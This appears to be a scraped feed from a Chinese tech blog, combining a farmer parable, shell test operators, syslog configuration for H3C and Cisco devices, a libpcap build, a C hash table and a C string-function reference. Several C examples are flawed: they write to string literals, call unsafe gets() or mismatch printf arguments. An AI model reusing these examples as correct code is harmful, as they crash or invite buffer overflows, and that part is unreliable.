    B一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。农夫给他一个馒头、一碗水，饥饿者得救了。得救者走到农夫家里，发现农夫家里一无所有。感动得热泪盈眶，长跪不起。此后，他身怀感恩，把爱带给他所遇到的需要帮助的人。但是，对于农夫的行为，支持其善，直言其错，农夫辛勤耕耘，并不断改进，渐渐兴旺，广施爱心。
    思考1：感恩的方式不同会导致不同的结果。  
    思考2：正常的思维什么时候都要保持，直言、批评往往是更好的方式。
    思考3：其实，吃完馒头、喝碗水后，转身离开，也是一种感恩。很多时候，帮助人的人，只是怀着一颗平和、感恩的心在做，并不刻意希望得到赞美或者回报。

    （五）

    A.一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。农夫给他一个馒头、一碗水，饥饿者得救了。村里人逢人见到农夫就夸他，做了一件善事。后来，即使遇到自己力不能及的事情，农夫也主动伸手相助。
    B一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。农夫给他一个馒头、一碗水，饥饿者得救了。有人怀疑农夫作秀，甚至怀疑这个饥饿者就是农夫自己找人扮演的。于是，农夫遇到求助者，就躲得远远的，恐怕再遭诋毁。
    思考1：赞美或者诋毁，往往会影响一些人的行为——一些心智不够成熟者的行为。
    思考2：如果祈求某种行为得到一致的评价，只会让自己走火入魔。
    思考3：遇到诋毁就逃避的人，永远只能当懦夫。
    思考4：农夫应该迅速忘记那个馒头和那碗水，并忘掉人们所说的，平静地做自己的事情，做一个快乐的农夫。

]]> http://www.idcnote.com/default.asp?id=61 wentaiyou@126.com(kevin) Tue,23 Feb 2010 12:41:49 +0800 http://www.idcnote.com/default.asp?id=61
str1 = str2　　　　　　当两个串有相同内容、长度时为真
str1 != str2　　　　　 当串str1和str2不等时为真
-n str1　　　　　　　 当串的长度大于0时为真(串非空)
-z str1　　　　　　　 当串的长度为0时为真(空串)
str1　　　　　　　　   当串str1为非空时为真

2 数字的判断

int1 -eq int2　　　　两数相等为真
int1 -ne int2　　　　两数不等为真
int1 -gt int2　　　　int1大于int2为真
int1 -ge int2　　　　int1大于等于int2为真
int1 -lt int2　　　　int1小于int2为真
int1 -le int2　　　　int1小于等于int2为真

3 文件的判断

-r file　　　　　用户可读为真
-w file　　　　　用户可写为真
-x file　　　　　用户可执行为真
-f file　　　　　文件为正规文件为真
-d file　　　　　文件为目录为真
-c file　　　　　文件为字符特殊文件为真
-b file　　　　　文件为块特殊文件为真
-s file　　　　　文件大小非0时为真
-t file　　　　　当文件描述符(默认为1)指定的设备为终端时为真

3 复杂逻辑判断

-a 　 　　　　　 与
-o　　　　　　　 或
!　　　　　　　　非
]]> http://www.idcnote.com/default.asp?id=60 wentaiyou@126.com(kevin) Sat,06 Feb 2010 13:14:01 +0800 http://www.idcnote.com/default.asp?id=60 把文件SYSLOGD_OPTIONS选项后多加一个-r
然后再增加/etc/syslog.conf配制.服务器的配制可以看系统的man syslog




H3C设备配置步骤

<Sysname> system-view

[Sysname] info-center enable

    # 指定向日志主机输出日志信息的通道为 loghost 通道。

[Sysname] info-center loghost 1.2.0.1 channel loghost

      # 关闭所有模块日志主机的 log、trap、debug 的状态。

[Sysname] info-center source default channel loghost debug state off log state off trap state off

注意：

由于系统对各通道允许输出的系统信息的缺省情况不一样，所以配置前必须将所有模块的需求通道（本例为loghost ）上log、trap、debug 状态设为关闭，再根据当前的需求配置输出相应的系统信息。可以用display channel 命令查看通道的状态。

# 将 IP 地址为 1.2.0.1/16 的主机作为日志主机，设置信息级别为informational，输出语言为英文，允许输出信息的模块为所有模块。

[Sysname] info-center loghost 1.2.0.1 facility local7 language english

[Sysname] info-center source default channel loghost log level informational


进行以上操作之后，系统就可以在相应的文件中记录日志信息了。


CISCO交换机的设置举例

以下配置描述了如何将Cisco设备的日志发往syslog服务器

　　cisco#conf t
　　
　　cisco(config)#logging on
　　
　　cisco(config)#logging a.b.c.d //日志服务器的IP地址
　　
　　cisco(config)#logging facility local1　//facility标识, RFC3164 规定的本地设备标识为 local0 - local7
　　
　　cisco(config)#logging trap errors //日志记录级别，可用"?"查看详细内容

可选的级别有0－7共八个级别，0最高，7最低。这八个级别分别为：
alerts Immediate action needed (severity=1)
critical Critical conditions (severity=2)
debugging Debugging messages (severity=7)
emergencies System is unusable (severity=0)
errors Error conditions (severity=3)
informational Informational messages (severity=6)
notifications Normal but significant conditions (severity=5)
warnings Warning conditions (severity=4)
(config)#logging on 启用日志服务。

选取最低的debugging级别可以记录所有可以记录的信息，包括系统信息、错误信息、debug信息等等。但是仍然不能满足我们的全部需求。　　
　　cisco(config)#logging source-interface e0 //日志发出用的源IP地址
　　
　　
　　cisco(config)#service timestam log datetime localtime
　　日志记录的时间戳设置，可根据需要具体配置
　　
　　检验
　　
　　cisco#sh logging
]]> http://www.idcnote.com/default.asp?id=59 wentaiyou@126.com(kevin) Wed,28 Oct 2009 16:21:07 +0800 http://www.idcnote.com/default.asp?id=59 http://public.lanl.gov/cpw/
下载板本
以上有清楚的介绍及安装.

rpm -e   --nodeps  libpcap-*  先要删除原先系统上的PCAP可以通过RPM -QA来查看


cd /tmp
tar -zxf /tmp/libpcap-0.9.8.20081128.tar.gz
ln -s libpcap-0.9.8.20081128 libpcap
cd libpcap
sh bootstrap
Hopefully, you have installed: libtool automake autoconf flex bison
If you have problems, rm -rf config and re-issue the bootstrap program
Ok to proceed?[N/y] y

./configure --prefix=/usr --enable-shared
make clean
make install
ldconfig
]]> http://www.idcnote.com/default.asp?id=58 wentaiyou@126.com(kevin) Mon,19 Oct 2009 20:51:09 +0800 http://www.idcnote.com/default.asp?id=58 http://blog.csdn.net/netpet/archive/2008/08/27/2836783.aspx

修改并做了个测试文件：

新建以下三个文件。在LINUX 2.6.8中
gcc -o test test.c


test.c文件中加入了一些时间测试变量及gettimeofday()
在WINDOWS测试中需修改一下时间测试参数，可以在头文件中修改一下宏（暂没修改。呵呵！）

文件1   myhash.h
#ifndef _HASHTABLE_H
#define    _HASHTABLE_H

#ifdef    __cplusplus
extern "C" {
#endif

#define NIL -1
#define HashDefaultlength 11
#include <stdlib.h>

typedef struct _HashNode HashNode;
typedef struct _hashTable HashTable;

struct _HashNode{
    char * key;
    void * value;
    HashNode *next;
    HashNode *pt;
};

struct _hashTable
{
    unsigned int size;
    unsigned int current;
    HashNode items[1];
};

extern unsigned int GethashValue(char *key);
extern void * HashGet(HashTable *T,char * key);//HashSearch
extern void HashSet(HashTable **To,char * key,void *value);
extern void HashAdd(HashTable **To,char * key,void *value);
void HashRemove(HashTable *T,char * key);
int HashContainKey(HashTable *T,char * key);
HashTable * HashTableNew(int length);
HashTable * NewHashTable(void);
HashTable * HashExpend(HashTable ** T);
void PrintHash(HashTable *T);
void HashFree(HashTable *T);


#ifdef    __cplusplus
}
#endif

#endif    /* _HASHTABLE_H */

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////

文件2   myhash.c
#include "myhash.h"
#include <stdio.h>
unsigned int GethashValue(char *key)
{
    unsigned int hash;
    unsigned char *p;
    for(hash=0, p = (unsigned char *)key; *p ; p++)
        hash = 31 * hash + *p;
    hash=hash & 0x7FFFFFFF;
    return hash;
}


HashTable * HashTableNew(int length)
{
    HashTable *hs=(HashTable *)calloc(1,length*(sizeof(HashNode))+sizeof(HashTable));
    hs->size=length;
    hs->current=0;
    return hs;
}

HashTable * NewHashTable(void)
{
    HashTable *hs=(HashTable *)calloc(1,HashDefaultlength*(sizeof(HashNode))+sizeof(HashTable));
    hs->size=HashDefaultlength;
    hs->current=0;
    return hs;
}

void * HashGet(HashTable *T,char * key)
{
    unsigned int hash;
    int index;
    HashNode *node;

    hash=GethashValue(key);
    index=hash%T->size;
    node=T->items[index].pt;
    while(node) {
        if(!strcmp(key, node->key))
            return node->value;
        node=node->next;
    }
    return NULL;
}

void HashSet(HashTable **To,char * key,void *value)
{
    unsigned int hash;
    int index;
    HashNode *node;
    HashTable   * T=*To;
    
    if((T->size*75)<(T->current*100)) {
        HashExpend(To);
        T=*To;
    }
    
    hash=GethashValue(key);
    index=hash%T->size;
    node=T->items[index].pt;
    if(!node)
        T->items[index].pt=&T->items[T->current];
    else {
          
        while(node){
            if(!strcmp(key, node->key)) {
                node->value=value;
                return;
            }
            if(node->next)
                node=node->next;
            else
                break;
        }
        node->next=&T->items[T->current];
        node=node->next;
        node->next=NULL;
        
    }
    T->items[T->current].key=key;
    T->items[T->current].value=value;
    T->current++;
}

void HashAdd(HashTable **To,char * key,void *value)
{

    HashNode *node;
    unsigned int hash;
    int index;
    
    HashTable   * T=*To;
    if((T->size*75)<(T->current*100)){
        HashExpend(To);
        T=*To;
    }
    hash=GethashValue(key);
    index=hash%T->size;

    T->items[T->current].key=key;
    T->items[T->current].value=value;
    if(T->items[index].pt)
    {
        node=T->items[index].pt;
        while(node->next)
            node=node->next;
        node->next=&T->items[T->current];
        node=node->next;
        node->next=NULL;
    }
    else
        T->items[index].pt=&T->items[T->current];
    T->current++;
}

void HashRemove(HashTable *T, char * key) {

    unsigned int hash;
    int index;
    HashNode *node, *node1;

    hash=GethashValue(key);
    index=hash%T->size;
    node=T->items[index].pt;
    node1=node;
    while(node) {
        if(!strcmp(key, node->key)) {
            node->key=NULL;
            node->value=NULL;
            if(node==T->items[index].pt)
                T->items[index].pt=NULL;
            else
                node1->next=node->next;
            return;
        }
        node1=node;
        node=node->next;
    }
}

int HashContainKey(HashTable *T,char * key)
{
    unsigned int hash;
    int index;
    HashNode *node;

   hash=GethashValue(key);
    index=hash%T->size;
    node=T->items[index].pt;
    while(node) {
        if(!strcmp(key, node->key))
            return 1;
        node=node->next;
    }
    return 0;
}

void HashCopy(HashTable **Tn,HashTable *To)
{
    unsigned int i;
    HashTable *T=*Tn;
    HashNode * node=T->items;
    HashNode * nodeT=To->items;
    for(i=0;i<To->size;i++)
    {
        if(nodeT[i].key)
        {
        HashAdd(Tn,nodeT[i].key,nodeT[i].value);
        }
    }
}

HashTable * HashExpend(HashTable ** To)
{
    HashTable *T=*To;
    HashTable *hs;
    unsigned int length;
    length =(T->current) * 2 + 1;
    hs=(HashTable *)calloc(1, length*(sizeof(HashNode))+sizeof(HashTable));
    hs->size=length;
    hs->current=0;
    HashCopy(&hs, T);
    
    free(*To);
    *To=hs;
    return hs;
}

void PrintHash(HashTable *T)
{
    HashNode *node=T->items,*node1;
    int i;
    for(i=0;i<T->size;i++) {
            //if(node[i].key)
            //printf("loop：%d:________________________\n",i);
                printf("%d this index：Key:%s PT:%p,Next:%p,%p\n",i, node[i].key,node[i].value,node[i].pt,node[i].next,node[i]);
            node1=node[i].pt;
            while(node1)
            {
             printf("   %d include index：Key:%s \tPT:%p,\tNext:%p,%p\n",i, node1->key,node1->value,node1->pt,node1->next,node1);
             node1=node1->next;
            }
        }
}

void HashFree(HashTable *T)
{
    free(T);

}


//////////////////////////////////////////////////////////////////////////////////////////////////////
文件3 test.c

#include "myhash.c"
#include <string.h>
#define N 100001
#define L 32

int main(int argc ,char **argv)
{
    char key[N][L];
    char value[N][L];
    char f[L];
    int i,n;
    char *pf;
    float timeuse;
    struct timeval tpstart,tpend;
    
    HashTable *p;
    
    if(argc != 2 ){
        printf("./test num\n");
        exit(0);
    }
    n = atoi(argv[1]);
    if(n>N) n=N;

    //p = NewHashTable();
    p = HashTableNew(n);
    
    printf("buf size(%lu): %lubyte\n",sizeof(key)+sizeof(value),sizeof(key)+sizeof(value)+(n*(sizeof(HashNode))+sizeof(HashTable)));
    for(i=0;i<n;i++){
        sprintf(key[i],"key.%d",i);
        sprintf(value[i],"value.%d",i);
        HashAdd(&p,key[i],value[i]);
    }
    
    if(n <20 )
        PrintHash(p);
        
    printf("\n");
    
    while(1){
        printf("Input string(key.N): ");
        scanf("%s",f);
        if(strcmp(f,"exit")==0 || strlen(f)<1) break;
        
        gettimeofday(&tpstart,NULL);
        if((pf= (char *)HashGet(p,f)) == NULL)
            printf("NULL ");
        else
            printf("%s ",pf);
        gettimeofday(&tpend,NULL);
        timeuse=(float)(tpend.tv_sec-tpstart.tv_sec)+(float)(tpend.tv_usec-tpstart.tv_usec)/1000000;
        printf(" timeuse: %f\n",timeuse);
    }
    
    
    HashFree(p);
    
}]]> http://www.idcnote.com/default.asp?id=57 wentaiyou@126.com(kevin) Mon,19 Oct 2009 17:14:59 +0800 http://www.idcnote.com/default.asp?id=57 功 能: 拷贝一个字符串到另一个
用 法: char *stpcpy(char *destin, char *source);
程序例:

#include <stdio.h>
#include <string.h>

int main(void)
{
   char string[10];
   char *str1 = "abcdefghi";

   stpcpy(string, str1);
   printf("%s\n", string);
   return 0;
}




函数名: strcat
功 能: 字符串拼接函数
用 法: char *strcat(char *destin, char *source);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
   char destination[25];
   char *blank = " ", *c = "C++", *Borland = "Borland";

   strcpy(destination, Borland);
   strcat(destination, blank);
   strcat(destination, c);

   printf("%s\n", destination);
   return 0;
}




函数名: strchr
功 能: 在一个串中查找给定字符的第一个匹配之处\
用 法: char *strchr(char *str, char c);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
    char string[15];
    char *ptr, c = 'r';

    strcpy(string, "This is a string");
    ptr = strchr(string, c);
    if (ptr)
       printf("The character %c is at position: %d\n", c, ptr-string);
    else
       printf("The character was not found\n");
    return 0;
}




函数名: strcmp
功 能: 串比较
用 法: int strcmp(char *str1, char *str2);
看Asic码，str1>str2，返回值 > 0；两串相等，返回0
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
    char *buf1 = "aaa", *buf2 = "bbb", *buf3 = "ccc";
    int ptr;

    ptr = strcmp(buf2, buf1);
    if (ptr > 0)
       printf("buffer 2 is greater than buffer 1\n");
    else
       printf("buffer 2 is less than buffer 1\n");

    ptr = strcmp(buf2, buf3);
    if (ptr > 0)
       printf("buffer 2 is greater than buffer 3\n");
    else
       printf("buffer 2 is less than buffer 3\n");

    return 0;
}




函数名: strncmpi
功 能: 将一个串中的一部分与另一个串比较, 不管大小写
用 法: int strncmpi(char *str1, char *str2, unsigned maxlen);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
   char *buf1 = "BBB", *buf2 = "bbb";
   int ptr;

   ptr = strcmpi(buf2, buf1);

   if (ptr > 0)
      printf("buffer 2 is greater than buffer 1\n");

   if (ptr < 0)
      printf("buffer 2 is less than buffer 1\n");

   if (ptr == 0)
      printf("buffer 2 equals buffer 1\n");

   return 0;
}




函数名: strcpy
功 能: 串拷贝
用 法: char *strcpy(char *str1, char *str2);
程序例:

#include <stdio.h>
#include <string.h>

int main(void)
{
    char string[10];
    char *str1 = "abcdefghi";

    strcpy(string, str1);
    printf("%s\n", string);
    return 0;
}




函数名: strcspn
功 能: 在串中查找第一个给定字符集内容的段
用 法: int strcspn(char *str1, char *str2);
程序例:

#include <stdio.h>
#include <string.h>
#include <alloc.h>

int main(void)
{
    char *string1 = "1234567890";
    char *string2 = "747DC8";
    int length;

    length = strcspn(string1, string2);
    printf("Character where strings intersect is at position %d\n", length);

    return 0;
}




函数名: strdup
功 能: 将串拷贝到新建的位置处
用 法: char *strdup(char *str);
程序例:

#include <stdio.h>
#include <string.h>
#include <alloc.h>

int main(void)
{
    char *dup_str, *string = "abcde";

    dup_str = strdup(string);
    printf("%s\n", dup_str);
    free(dup_str);

    return 0;
}




函数名: stricmp
功 能: 以大小写不敏感方式比较两个串
用 法: int stricmp(char *str1, char *str2);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
   char *buf1 = "BBB", *buf2 = "bbb";
   int ptr;

   ptr = stricmp(buf2, buf1);

   if (ptr > 0)
      printf("buffer 2 is greater than buffer 1\n");

   if (ptr < 0)
      printf("buffer 2 is less than buffer 1\n");

   if (ptr == 0)
      printf("buffer 2 equals buffer 1\n");

   return 0;
}



函数名: strerror
功 能: 返回指向错误信息字符串的指针
用 法: char *strerror(int errnum);
程序例:

#include <stdio.h>
#include <errno.h>

int main(void)
{
   char *buffer;
   buffer = strerror(errno);
   printf("Error: %s\n", buffer);
   return 0;
}




函数名: strcmpi
功 能: 将一个串与另一个比较, 不管大小写
用 法: int strcmpi(char *str1, char *str2);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
   char *buf1 = "BBB", *buf2 = "bbb";
   int ptr;

   ptr = strcmpi(buf2, buf1);

   if (ptr > 0)
      printf("buffer 2 is greater than buffer 1\n");

   if (ptr < 0)
      printf("buffer 2 is less than buffer 1\n");

   if (ptr == 0)
      printf("buffer 2 equals buffer 1\n");

   return 0;
}




函数名: strncmp
功 能: 串比较
用 法: int strncmp(char *str1, char *str2, int maxlen);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)

{
   char *buf1 = "aaabbb", *buf2 = "bbbccc", *buf3 = "ccc";
   int ptr;

   ptr = strncmp(buf2,buf1,3);
   if (ptr > 0)
      printf("buffer 2 is greater than buffer 1\n");
   else
      printf("buffer 2 is less than buffer 1\n");

   ptr = strncmp(buf2,buf3,3);
   if (ptr > 0)
      printf("buffer 2 is greater than buffer 3\n");
   else
      printf("buffer 2 is less than buffer 3\n");

   return(0);
}



函数名: strncmpi
功 能: 把串中的一部分与另一串中的一部分比较, 不管大小写
用 法: int strncmpi(char *str1, char *str2);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
   char *buf1 = "BBBccc", *buf2 = "bbbccc";
   int ptr;

   ptr = strncmpi(buf2,buf1,3);

   if (ptr > 0)
      printf("buffer 2 is greater than buffer 1\n");

   if (ptr < 0)
      printf("buffer 2 is less than buffer 1\n");

   if (ptr == 0)
      printf("buffer 2 equals buffer 1\n");

   return 0;
}



函数名: strncpy
功 能: 串拷贝
用 法: char *strncpy(char *destin, char *source, int maxlen);
程序例:

#include <stdio.h>
#include <string.h>

int main(void)
{
   char string[10];
   char *str1 = "abcdefghi";

   strncpy(string, str1, 3);
   string[3] = '\0';
   printf("%s\n", string);
   return 0;
}



函数名: strnicmp
功 能: 不注重大小写地比较两个串
用 法: int strnicmp(char *str1, char *str2, unsigned maxlen);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
   char *buf1 = "BBBccc", *buf2 = "bbbccc";
   int ptr;

   ptr = strnicmp(buf2, buf1, 3);

   if (ptr > 0)
      printf("buffer 2 is greater than buffer 1\n");

   if (ptr < 0)
      printf("buffer 2 is less than buffer 1\n");

   if (ptr == 0)
      printf("buffer 2 equals buffer 1\n");

   return 0;
}




函数名: strnset
功 能: 将一个串中的所有字符都设为指定字符
用 法: char *strnset(char *str, char ch, unsigned n);
程序例:

#include <stdio.h>
#include <string.h>

int main(void)
{
   char *string = "abcdefghijklmnopqrstuvwxyz";
   char letter = 'x';

   printf("string before strnset: %s\n", string);
   strnset(string, letter, 13);
   printf("string after strnset: %s\n", string);

   return 0;
}



函数名: strpbrk
功 能: 在串中查找给定字符集中的字符
用 法: char *strpbrk(char *str1, char *str2);
程序例:

#include <stdio.h>
#include <string.h>

int main(void)
{
   char *string1 = "abcdefghijklmnopqrstuvwxyz";
   char *string2 = "onm";
   char *ptr;

   ptr = strpbrk(string1, string2);

   if (ptr)
      printf("strpbrk found first character: %c\n", *ptr);
   else
      printf("strpbrk didn't find character in set\n");

   return 0;
}




函数名: strrchr
功 能: 在串中查找指定字符的最后一个出现
用 法: char *strrchr(char *str, char c);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
   char string[15];
   char *ptr, c = 'r';

   strcpy(string, "This is a string");
   ptr = strrchr(string, c);
   if (ptr)
      printf("The character %c is at position: %d\n", c, ptr-string);
   else
      printf("The character was not found\n");
   return 0;
}




函数名: strrev
功 能: 串倒转
用 法: char *strrev(char *str);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
   char *forward = "string";

   printf("Before strrev(): %s\n", forward);
   strrev(forward);
   printf("After strrev(): %s\n", forward);
   return 0;
}


函数名: strset
功 能: 将一个串中的所有字符都设为指定字符
用 法: char *strset(char *str, char c);
程序例:

#include <stdio.h>
#include <string.h>

int main(void)
{
   char string[10] = "123456789";
   char symbol = 'c';

   printf("Before strset(): %s\n", string);
   strset(string, symbol);
   printf("After strset(): %s\n", string);
   return 0;
}




函数名: strspn
功 能: 在串中查找指定字符集的子集的第一次出现
用 法: int strspn(char *str1, char *str2);
程序例:

#include <stdio.h>
#include <string.h>
#include <alloc.h>

int main(void)
{
   char *string1 = "1234567890";
   char *string2 = "123DC8";
   int length;

   length = strspn(string1, string2);
   printf("Character where strings differ is at position %d\n", length);
   return 0;
}



函数名: strstr
功 能: 在串中查找指定字符串的第一次出现
用 法: char *strstr(char *str1, char *str2);
程序例:

#include <stdio.h>
#include <string.h>

int main(void)
{
   char *str1 = "Borland International", *str2 = "nation", *ptr;

   ptr = strstr(str1, str2);
   printf("The substring is: %s\n", ptr);
   return 0;
}



函数名: strtod
功 能: 将字符串转换为double型值
用 法: double strtod(char *str, char **endptr);
程序例:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
   char input[80], *endptr;
   double value;

   printf("Enter a floating point number:");
   gets(input);
   value = strtod(input, &endptr);
   printf("The string is %s the number is %lf\n", input, value);
   return 0;
}




函数名: strtok
功 能: 查找由在第二个串中指定的分界符分隔开的单词
用 法: char *strtok(char *str1, char *str2);
程序例:

#include <string.h>
#include <stdio.h>

int main(void)
{
   char input[16] = "abc,d";
   char *p;

   /* strtok places a NULL terminator
   in front of the token, if found */
   p = strtok(input, ",");
   if (p)   printf("%s\n", p);

   /* A second call to strtok using a NULL
   as the first parameter returns a pointer
   to the character following the token */
   p = strtok(NULL, ",");
   if (p)   printf("%s\n", p);
   return 0;
}




函数名: strtol
功 能: 将串转换为长整数
用 法: long strtol(char *str, char **endptr, int base);
程序例:

#include <stdlib.h>
#include <stdio.h>

int main(void)
{
   char *string = "87654321", *endptr;
   long lnumber;

   /* strtol converts string to long integer */
   lnumber = strtol(string, &endptr, 10);
   printf("string = %s long = %ld\n", string, lnumber);

   return 0;
}


函数名: strupr
功 能: 将串中的小写字母转换为大写字母
用 法: char *strupr(char *str);
程序例:

#include <stdio.h>
#include <string.h>

int main(void)
{
   char *string = "abcdefghijklmnopqrstuvwxyz", *ptr;

   /* converts string to upper case characters */
   ptr = strupr(string);
   printf("%s\n", ptr);
   return 0;
}




函数名: swab
功 能: 交换字节
用 法: void swab (char *from, char *to, int nbytes);
程序例:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char source[15] = "rFna koBlrna d";
char target[15];

int main(void)
{
   swab(source, target, strlen(source));
   printf("This is target: %s\n", target);
   return 0;
}
]]>